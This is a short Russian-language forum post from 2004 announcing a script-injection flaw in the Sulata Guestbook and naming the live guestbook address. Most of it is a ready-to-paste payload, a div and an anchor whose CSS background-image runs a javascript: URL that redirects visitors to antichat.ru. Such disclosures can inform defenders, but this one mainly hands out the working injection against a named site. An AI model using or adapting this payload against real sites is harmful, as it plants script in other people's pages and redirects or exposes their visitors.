Показать сообщение отдельно

  #1  
Старый 07.05.2004, 10:02
Егорыч+++
Познавший АНТИЧАТ
Регистрация: 27.05.2002
Сообщений: 1,241
Провел на форуме:
20377164

Репутация: 0


По умолчанию

Уязвимость гостевой книги Sulata Guestbook .
В данной гостевой книги возможна вставка скрипта в тело сообщения. Гостевая книга находится по адресу http://www.sulata.com.pk/sulatagb/

Для примера в тело сообщения можно вставить следующее
<div id=aa>http://antichat.ru</div><a style=background-image:url(javascript:navigate(aa[0].innerText));></a> получаем редирект на antichat.ru
 
Ответить с цитированием